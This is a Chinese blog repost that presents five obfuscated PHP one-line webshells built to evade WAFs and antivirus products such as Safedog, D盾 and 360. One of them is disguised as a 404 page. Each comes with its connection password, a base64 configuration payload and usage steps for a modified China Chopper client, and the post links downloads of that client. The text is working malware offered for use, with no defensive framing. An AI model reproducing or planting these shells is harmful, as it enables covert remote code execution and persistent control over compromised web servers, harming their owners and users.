免杀的php webshell
程序员文章站
2022-06-22 15:39:05
...
转载自:http://blog.csdn.net/settoken/article/details/51581776
中国菜刀下载,基于原版中国菜刀优化版20160309.
下载地址:
http://download.csdn.net/detail/settoken/9457567
https://pan.baidu.com/s/1jHoJxHW
China chopper
https://pan.baidu.com/s/1eRxEYjC
特别推荐的一个PHP一句话.
菜刀可以连接,过waf,过安全狗,D盾,360,php一句话木马带404页面,带MD5加密,可浏览器POST任意php代码执行.
代码如下:
<?php
echo "404 Not Found!</br>"; error_reporting(0);
if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content));
echo "We're sorry but the page your are looking for is Not Found..."
?>
使用优化版菜刀连接,使用方法如下.
菜刀配置填:com=settoken&content=ZXZhbCgkX1BPU1RbJ3BhZ2UnXSk7
连接密码:page
附上连接图片:
下面介绍使用浏览器POST提交执行任意php代码.
POST提交:com=1&&content=cGhwaW5mbygpOw== //phpinfo(); 执行是phpinfo
第一个:
<?php $mt="mFsKCleRfU"; $ojj="IEBleldle"; $hsa="E9TVFsnd2VuJ10p"; $fnx="Ow=="; $zk = str_replace("d","","sdtdrd_redpdldadcde"); $ef = $zk("z", "", "zbazsze64_zdzeczodze"); $dva = $zk("p","","pcprpepaptpe_fpupnpcptpipopn"); $zvm = $dva('', $ef($zk("le", "", $ojj.$mt.$hsa.$fnx))); $zvm(); ?>
连接密码:wen 以上一句话,使用原版本优化的效果更好. 可以waf.
第二个:
<?php
@$a = $_POST['x'];
if(isset($a)){
@preg_replace("/
(.∗)
/e",'\\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10='));
}
?>
连接密码:x
第三个:
<?php
$sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n985de9'];if(isset($s22)){eval($s21($s22));}?>
菜刀配置填n985de9=QGV2YWwoJF9QT1NUWzBdKTs=
连接密码:0
第四个:
<?php $_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);@$_();?>
连接密码:1
上一篇: mac sed目录文件内容替换
下一篇: sed 命令替换文件中的内容